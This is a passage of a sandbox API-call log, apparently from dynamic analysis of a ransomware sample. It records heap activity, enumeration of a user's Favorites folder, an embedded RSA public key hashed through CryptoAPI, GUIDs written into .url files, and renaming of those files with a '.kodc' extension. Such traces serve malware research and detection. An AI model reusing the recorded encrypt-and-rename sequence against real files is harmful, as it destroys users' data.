hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.619] GetCurrentThreadId () returned 0x42c [0101.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8308 [0101.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.620] GetCurrentThreadId () returned 0x42c [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8088 [0101.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80a0 [0101.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8070 [0101.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb80b8 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8088 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8088 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8088 | out: hHeap=0x630000) returned 1 [0101.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80b8 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80a0 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8070 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8058 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb6118 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.625] WriteFile (in: hFile=0x5cc, lpBuffer=0x65e7c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x65e7c0*, lpNumberOfBytesWritten=0x9e2fb14*=0x80, lpOverlapped=0x0) returned 1 [0101.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.625] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.625] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0101.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0101.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0101.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0101.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0101.625] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.626] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.626] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.626] CloseHandle (hObject=0x5cc) returned 1 [0101.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0101.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.627] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.kodc")) returned 1 [0101.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.628] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.629] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0101.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.629] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.629] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0101.629] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.630] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.631] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.634] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.634] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.635] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.635] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.635] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.635] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.635] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.635] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.636] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.636] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.636] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.636] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.636] GetLastError () returned 0x0 [0101.636] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.636] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.637] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.637] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.637] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.637] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6118 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8058 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6160 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8070 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80a0 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80b8 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.637] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80a0 | out: hHeap=0x630000) returned 1 [0101.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80b8 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb80b8 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb80a0 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0101.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0101.638] RtlAllocateHeap 